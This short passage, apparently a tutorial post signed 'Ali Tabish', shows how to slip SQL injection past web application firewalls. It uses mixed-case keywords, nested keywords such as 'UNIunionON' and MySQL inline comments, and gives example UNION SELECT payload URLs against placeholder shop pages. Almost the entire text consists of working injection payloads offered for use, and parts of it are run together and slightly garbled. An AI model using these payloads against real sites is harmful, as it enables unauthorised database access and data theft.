Function Capitalization Technique:-For those WAF's, which filter only lowercase, we can easily bypass:
Query!https://lxy.com/cost.php?id=90 UNION SELECT 1,2,3—
Bypass!http://lxy.com/cost.php?id=-90 uniOn SeLeCt 1,2,3—
Replaced Keywords Technique:-For those WAF's, which escape certain keywords such as UNION, SELECT, ORDER BY, and so on:
Query!http://abcxyz.com/itemdetail.php?id=-57 UNION SELECT 1,2—
Bypass!http://abcxyz.com/itemdetail.php?id=-57 UNIunionON SEselectLECT 1,2—Sqlihttp://xyz.com/pricing.php?id=32 union all select 1,2,3—-By passed Sqlihttp://xyz.com/pricing.php?id=32 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3—-
Stay Linked!!Ali Tabish